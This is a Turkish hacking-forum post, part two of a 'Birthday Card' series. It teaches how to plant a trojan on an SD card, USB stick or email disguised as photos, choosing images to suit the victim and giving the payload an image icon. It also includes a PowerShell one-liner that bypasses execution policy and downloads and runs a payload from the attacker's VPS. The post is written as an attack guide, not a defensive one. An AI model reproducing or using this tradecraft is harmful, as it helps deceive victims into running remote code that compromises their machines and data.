"Vatanını en çok seven, görevini en iyi yapandır."


Hoş Geldin, Ziyaretçi!

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı yada giriş yapmalısınız. Forum üye olmak tamamen ücretsizdir.

  • Yeni üyeler Neler Yapmalı, Nasıl Başlamalı? Detaylar için tıklayın
    Rütbeler ve genel görevlendirme konuları hakkında bilgi almak için tıklayın
    Uzmanlık alanları hakkında bildirge için tıklayın
    Güncel forum kuralları için tıklayın

Doğum Günü Kartı Bölüm.2 Kıvılcım

gr3nax

Er
Katılım
18 Mar 2018
Mesajlar
210
Önceki bölümüzde size saldırının nasıl olacağını ne ne yapacağımızı anlatmışdım ve bir kaç eksiğimiz olmuşdu onları yorumlar kısmından bulabilirsiniz.
uyeler/efendibey.2/ e teşekürler.

Sd kartımıza ( usb/cd/e-mail) imiz için en az 1 fotoğrafa ihtiyacımız var birden fazla fotoğrafla birden fazla payloadımızın olması da mümkündür. Eğer birden fazla fotoğraf koyarsak 5 fotoğrafdan 1 inin açılmaması pek şüpe çekmiyecekdir.

Sosyal mühendislik tecrübelerine ve hedefi ne kadar iyi tanıdığına göre koyacağın fotoğraflar değişebilir örneğin hedefin çicek dükkanıysa çiçek fotoğrafları kadınlara düşkünse kadın fotoğrafları yaşlı biriyse hayvan resimleri koyabilirsin bu kısım sana ve hedefine bağlıdır.
Fakat fotoğrafın 720x720 den fazla olması daha iyi olacakdır instagram daki fotoğraflar kusursuz bir ikon oluşdurucakdır daha küçük fotoğrafların etrafında beyaz bir boşluk kalabilir ve saldırınız başarısız olabilir.

Fotoğrafların cihazımıza aktarımı:

Bir fotoğraf bulduğunuzda onu sd kartımıza (usb/e-posta) mıza yüklemek isteyeceğiz fakat payloadımız ve gerçek fotoğraf aynı göründüğü için iki tane aynı fotoğraf dikkat çekebilir.

Tabiki bunu bir kılasörün içine saklamayacağız ve windows orjinal resmi otomatik olarak gizlemiyecekdir.
Grenax geveleme de söyle nasıl gizleyeceğiz orjinal fotoğrafı ?
trojan.png

Payload fotoğrafımızı ico ya dönüşdürmek:

Şimdi fotoğrafımızı ico formatına jpg den ico formatına dönüşdürelim ico formatı windows sistemlerinde küçük ikonu göstermek için kullanılır fotoğrafımızın ikonunun olması onu daha çekici yapıcakdır
Kullanacağımız site :
Please, Giriş yap or Kayıt ol to view URLs content!

hack-anyones-wi-fi-password-using-birthday-card-part-2-executing-attack.w1456.jpg
Dur daha işimiz bitmedi hemen ico formatındaki fotoğı sd kartına atma henüz powershell scriptimizi payloadımıza eklemekik. Hala yeni ikon fotoğrafımızla birlikde çalışacak bir powershell scriptine ihtiyacımız var .

PowerShell Nedir ?

Powershell microsoft un it profesiyonellerine yardım etmek için hazırladığı bir script dilidir hackerler 2006 dan beri amaçlarına ulaşmak için powershell i kötüye kullanırlar yani xp ve vista dan beri


Please, Giriş yap or Kayıt ol to view URLs content!
kurulumu:

Powershell scriptlerini yürütülebilir yapmak için windows programı olan
Please, Giriş yap or Kayıt ol to view URLs content!
yi kullanacağız bu program trojanımızın ikonunu değiştirip onu tıpkı bir fotoğraf gibi gösterecekdir.
Kullanacağımız program :
Please, Giriş yap or Kayıt ol to view URLs content!

Alternatif indirme linki :
Please, Giriş yap or Kayıt ol to view URLs content!

Eğer orjinal indirme linki çalışmıyorsa benim oluşdurduğum linden ulaşabilirsiniz.
Eğer bana güvenmiyorsanız veya garantici biriyseniz dosyayı virtural makinenizde veya sandboxunuzda deneyebilirsiniz.

Dönüşüm 1. script den exe ye:

powershell -ExecutionPolicy Bypass "IEX (New-Object
Net.WebClient).DownloadString('http://VPS İN BURAYA/payload.ps1');"

Bu komutumuz kısa ve basit tek yaptığı vps n deki powershell i otomatik olarak çalışdırmak
Windows sistemleri bazen kısıtlayıcı powershell çalışdırma ilkelerine sahip olabiliyor bunlar scriptlerimizin başarısız olmasıyla sonuçlanabilir .
-ExecutionPolicy Bypass komutumuz ilkeleri kırmamızda bize yardımcı olucak
 
Üst